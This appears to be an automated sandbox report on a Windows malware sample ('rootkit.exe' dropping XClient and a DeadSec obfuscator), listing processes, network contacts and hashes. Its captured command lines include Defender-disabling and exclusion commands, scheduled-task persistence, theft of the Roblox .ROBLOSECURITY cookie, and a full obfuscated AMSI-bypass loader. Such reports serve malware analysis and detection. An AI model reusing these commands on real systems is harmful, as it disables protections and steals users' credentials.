PID 3184 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2956 wrote to memory of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2956 wrote to memory of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2956 wrote to memory of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2956 wrote to memory of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2956 wrote to memory of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2956 wrote to memory of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2956 wrote to memory of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2956 wrote to memory of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 376 wrote to memory of 612 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 376 wrote to memory of 672 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 376 wrote to memory of 968 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 384 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 3312 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3312 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 672 wrote to memory of 2848 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 672 wrote to memory of 2848 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 376 wrote to memory of 700 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 1036 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 376 wrote to memory of 1112 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 1140 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 376 wrote to memory of 1184 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 1208 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 376 wrote to memory of 1252 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 1296 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 1364 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3184 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 3184 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 376 wrote to memory of 1408 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 672 wrote to memory of 2848 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 376 wrote to memory of 1496 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 672 wrote to memory of 2848 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 376 wrote to memory of 1588 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 1596 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 376 wrote to memory of 1688 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 376 wrote to memory of 1712 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 1764 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 376 wrote to memory of 1788 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 376 wrote to memory of 1872 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 376 wrote to memory of 2032 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 2044 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 376 wrote to memory of 1532 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 1940 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 2068 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 672 wrote to memory of 2120 N/A C:\Windows\system32\lsass.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 672 wrote to memory of 2268 N/A C:\Windows\system32\lsass.exe C:\Windows\System32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Users\Admin\AppData\Local\Temp\rootkit.exe

"C:\Users\Admin\AppData\Local\Temp\rootkit.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

"C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"

C:\Users\Admin\AppData\Local\Temp\Modify.exe

"C:\Users\Admin\AppData\Local\Temp\Modify.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Modify.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

"C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QghMCXDoDAhj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zeDJIHDraPQlze,[Parameter(Position=1)][Type]$rJIDyrTyBn)$BRUqJRZiOCH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+[Char](108)+'e'+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+[Char](101)+''+'m'+''+[Char](111)+'r'+[Char](121)+'M'+'o'+''+'d'+''+'u'+''+'l'+'e',$False).DefineType(''+'M'+'y'+[Char](68)+'el'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+'y'+[Char](112)+'e','Cl'+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+'S'+'ea'+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+'A'+'n'+''+[Char](115)+'iC'+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+'las'+[Char](115)+'',[MulticastDelegate]);$BRUqJRZiOCH.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+'p'+'e'+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+'e'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$zeDJIHDraPQlze).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+[Char](105)+'me,'+[Char](77)+''+'a'+''+[Char](110)+'a'+[Char](103)+'e'+'d'+'');$BRUqJRZiOCH.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','Pu'+[Char](98)+'li'+'c'+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+'yS'+'i'+''+'g'+''+[Char](44)+''+'N'+''+'e'+'wS'+'l'+''+[Char](111)+'t'+','+''+'V'+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+''+[Char](97)+'l',$rJIDyrTyBn,$zeDJIHDraPQlze).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+'M'+[Char](97)+'n'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $BRUqJRZiOCH.CreateType();}$adLTwGkHvlaqQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+'em'+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+'et'+'h'+''+'o'+''+[Char](100)+''+'s'+'');$XyzQGPuAtvSYnu=$adLTwGkHvlaqQ.GetMethod('Ge'+[Char](116)+'P'+'r'+''+[Char](111)+''+[Char](99)+'A'+'d'+''+'d'+''+[Char](114)+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$NwWSliCcKoXUzoJiZmO=QghMCXDoDAhj @([String])([IntPtr]);$zSDCHWHQrYPLiiiucJWZit=QghMCXDoDAhj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BMpopnyzoeD=$adLTwGkHvlaqQ.GetMethod(''+[Char](71)+''+'e'+'t'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+'r'+'n'+'el'+'3'+''+'2'+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')));$CTjFknMjGgihLs=$XyzQGPuAtvSYnu.Invoke($Null,@([Object]$BMpopnyzoeD,[Object](''+[Char](76)+'oa'+'d'+''+'L'+''+'i'+''+[Char](98)+''+'r'+''+'a'+''+[Char](114)+''+'y'+''+'A'+'')));$IbqICObzrKvjtnjIH=$XyzQGPuAtvSYnu.Invoke($Null,@([Object]$BMpopnyzoeD,[Object](''+[Char](86)+''+[Char](105)+'rtu'+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$pBfLdoV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CTjFknMjGgihLs,$NwWSliCcKoXUzoJiZmO).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i.'+'d'+''+[Char](108)+''+[Char](108)+'');$QPjNVbkBkekqhoPQc=$XyzQGPuAtvSYnu.Invoke($Null,@([Object]$pBfLdoV,[Object]('A'+[Char](109)+''+[Char](115)+'iS'+'c'+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+'f'+[Char](102)+''+'e'+''+'r'+'')));$RmafBvWwWO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IbqICObzrKvjtnjIH,$zSDCHWHQrYPLiiiucJWZit).Invoke($QPjNVbkBkekqhoPQc,[uint32]8,4,[ref]$RmafBvWwWO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QPjNVbkBkekqhoPQc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IbqICObzrKvjtnjIH,$zSDCHWHQrYPLiiiucJWZit).Invoke($QPjNVbkBkekqhoPQc,[uint32]8,0x20,[ref]$RmafBvWwWO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](119)+'w'+[Char](119)+'s'+[Char](116)+'a'+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{4867e75a-3aa2-49f1-869a-9acc3426f9e3}

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.DeadSecObbbfuscation.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.200.3:443 gstatic.com tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
N/A 127.0.0.1:49403 tcp
US 8.8.8.8:53 quotes-suites.gl.at.ply udp
N/A 127.0.0.1:49403 tcp
N/A 127.0.0.1:49403 tcp
US 8.8.8.8:53 quotes-suites.gl.at.ply udp
N/A 127.0.0.1:49403 tcp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 quotes-suites.gl.at.ply.gg udp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp

Files

memory/1884-0-0x00007FF8CDFD3000-0x00007FF8CDFD5000-memory.dmp

memory/1884-1-0x00000000006D0000-0x000000000071A000-memory.dmp

memory/1884-4-0x00007FF8CDFD0000-0x00007FF8CEA91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

MD5 737b2d60dc5d475685b65f5c288e00c0
SHA1 144ba7647d8609abe4aab74d4f191e2c594dd55a
SHA256 69c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084
SHA512 96a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6

C:\Users\Admin\AppData\Local\Temp\Modify.exe

MD5 9259d8aef8f52e8ff4fa082c0074c9b0
SHA1 88abb68a5632812be3c18e0c740e3818d9501b3e
SHA256 45d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db
SHA512 9cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede

memory/3184-28-0x000001FE30DC0000-0x000001FE30E00000-memory.dmp

memory/3312-19-0x00000000000E0000-0x00000000000F0000-memory.dmp

memory/3312-29-0x00007FF8CDFD0000-0x00007FF8CEA91000-memory.dmp

memory/3184-30-0x00007FF8CDFD0000-0x00007FF8CEA91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iuvpknto.caq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3808-40-0x00000196FB6E0000-0x00000196FB702000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

MD5 22d120454dd38d7f1a3f1cd0eb497f95
SHA1 4c11a082bf8e64b21310b959821a9f7324aa8107
SHA256 6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c
SHA512 1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9

memory/1884-73-0x00007FF8CDFD0000-0x00007FF8CEA91000-memory.dmp

memory/3184-76-0x000001FE4B550000-0x000001FE4B5C6000-memory.dmp

memory/3184-77-0x000001FE4B4D0000-0x000001FE4B520000-memory.dmp

memory/3184-78-0x000001FE32A40000-0x000001FE32A5E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 966914e2e771de7a4a57a95b6ecfa8a9
SHA1 7a32282fd51dd032967ed4d9a40cc57e265aeff2
SHA256 98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba
SHA512 dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 548dd08570d121a65e82abb7171cae1c
SHA1 1a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256 cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA512 37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

memory/3312-122-0x00007FF8CDFD0000-0x00007FF8CEA91000-memory.dmp

memory/3184-124-0x000001FE32BB0000-0x000001FE32BBA000-memory.dmp

memory/3184-125-0x000001FE4B6D0000-0x000001FE4B6E2000-memory.dmp

memory/2956-128-0x0000020978110000-0x000002097813A000-memory.dmp

memory/2956-129-0x00007FF8EC290000-0x00007FF8EC485000-memory.dmp

memory/2956-130-0x00007FF8EA600000-0x00007FF8EA6BE000-memory.dmp

memory/376-134-0x0000000140000000-0x0000000140008000-memory.dmp

